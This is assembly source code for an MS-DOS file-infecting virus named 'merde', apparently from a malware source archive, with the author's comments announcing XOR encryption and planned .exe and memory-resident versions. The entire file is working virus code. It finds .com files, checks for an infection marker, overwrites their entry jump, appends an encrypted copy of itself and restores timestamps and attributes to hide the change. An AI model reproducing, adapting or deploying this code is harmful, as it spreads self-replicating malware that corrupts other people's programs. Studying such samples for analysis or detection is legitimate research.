MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.merde-2.asm

203 lines
4.5 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;well, here's the next installment of the merde virus...all that is new;
;is your run of the mill xor encryption........and a little change in;
;the code itself to make it slightly more modular...;
;up+coming: .exe version(why put 'em together? makes it too big);
; an actual function besides infect!;
; TSR infect version?;
attrib equ 21
time equ 22
date equ 24
fspec_address equ 0e4h
filesize equ 26
fname equ 30
dta equ 80h
virsize equ 354
byte_compare_val equ 35
CODE_SEG SEGMENT BYTE
ASSUME DS:CODE_SEG, CS:CODE_SEG
ORG 100h
first: jmp caller
db 128 dup(00)
caller: call caller2 ;si=this address for the whole thing;
;ok, for encryption, we use the value of the byte at the jump instruction;
;if the file we find isn't infected...;
encryptv: db ?
;si=offset of the "caller";
caller2: pop si
sub si,3
jmp getstart
;jmp to getstart and have it call us back, getting the address of "start";
;into es..(I know, why not just add the size of the stuff to si?;
;I'll do it some other time;
after: pop es ;es=start:;
;okay, I decided, arbitrarily, to use bp and jump from the encrypt;
;function so it was more unsingular to a particular circumstance;
mov bp,es ;unencrypt de code+jump to virus;
jmp encrypt
;if we are being called from the write proc, we need to save BP on the stack;
encrypt_w: mov ax,bp ;ax=whereto jump at end;
pop bp ;bp=return to write routine;
push ax ;where to jump at end is on stack
;note the standard, run o' the mill encrypt/decrypt!;
encrypt: push bx ;might not be needed, I'll check later;
push si
mov cl,[si+3] ;offset of encrypt value;
mov bx,es ;where to start encrypting;
xor si,si
xloop: mov al,[bx+si]
xor al,cl
mov [bx+si],al
cmp si,0e7h ;size of post-start(or close enough);
ja done
inc si
jmp xloop
done: pop si
pop bx
jmp bp ;jump whereever we were supposed to;
write_code: call encrypt_w ;yep, encrypt it;
pop bp ;get back address in this infected file;
mov bx,[di+9] ;file to jump to, and file handle;
mov ah,40h
mov cx,virsize ;total virus size
mov dx,si
int 21h
call close_current
jmp nofiles ;not really, just didn't change name;
;this proc closes the file with original stats;
close_current:
mov dx,[di+14]
mov cx,[di+12]
mov ax,5701h
mov bx,[di+9]
int 21h
mov ah,3eh
int 21h
mov ax,4301h
xor ch,ch
mov cl,[di+11]
int 21h
ret
nofiles: push ds
pop es
jmp bp
getstart: call after
;encrypted from here on out-es=start of this procedure;
start: mov di,es
add di,fspec_address ;di=ADDRESS OF FILESPEC!;
mov dh,[di+18]
mov ah,[di+17]
mov al,[di+16]
mov bx,100h
mov [bx],al
mov [bx+1],ah
mov [bx+2],dh
mov bp,bx
mov ah,4eh ;------------------;
mov cx,33
mov dx,di ;find file match;
search: int 21h
jc nofiles ;get out if none found;
mov bx,dta+filesize ;compare filesize via BX;
cmp word ptr [bx],65000
ja leave1
cmp word ptr [bx],150
jb leave1
jmp ok
leave1: mov ah,4fh
jmp search
ok: CLC
;Okay-- DI=base of fspec;
mov bx,dta+attrib
mov al,[bx]
mov [di+11],al ;save attrib;
mov ax,word ptr [bx+1]
mov [di+12],ax ;save time;
mov ax,word ptr [bx+3]
mov [di+14],ax ;save date;
mov ax,4301h
mov cx,0
mov dx,dta+fname
int 21h ;set attrib to 0;
label2: mov ax,3d02h
int 21h
mov [di+9],ax ;open + save handle;
mov bx,ax
mov ah,3fh
mov cx,3
mov dx,di
add dx,16 ;dx points to save area for first three bytes;
int 21h ;open handle, and read 3 bytes into it;
cmp byte ptr [di+16],0e9h
jne label1
cont: mov ax,4200h
xor cx,cx
mov dx,[di+17]
add dx,3+byte_compare_val
mov bx,[di+9]
int 21h
mov ah,3fh
mov cx,2
mov dx,di
add dx,6
int 21h
mov dx,[di+6]
cmp dx,[si+byte_compare_val]
jne label1
call close_current
jmp leave1
label1:
;set encrypt value here---(low order byte of filesize of next file;
mov bx,dta+filesize
mov dl,[bx]
mov [si+3],dl
mov bx,[di+9]
mov ax,4200h
xor cx,cx
mov dx,0
int 21h
;okay, this is kinda thick..;
;set pointer to after jmp instruct, and change address to size;
;of file plus 3 for jmp instruction, minding that we have to flip stuff;
mov bx,dta+filesize
mov dh,[bx+1] ;high val equals 2nd part of word+vice versa;
mov dl,[bx]
sub dx,3
mov [di+7],dx
mov byte ptr [di+6],0e9h
mov ah,40h
mov bx,[di+9]
mov dx,di
add dx,6
mov cx,3
int 21h
xor cx,cx
mov ax,4202h
xor dx,dx
int 21h
jmp write_code
fspec: db '*.com',0 ;bx+0;
disk_buffer: db 3 DUP(?) ;di+6;
handle: dw ? ;di+9;
attribute: db ? ;di+11;
otime: dw ? ;di+12;
odate: dw ? ;di+14;
first_3: db 0cdh,20h,00 ;di+16;
CODE_SEG ENDS
2021-01-12 23:49:21 +00:00
END first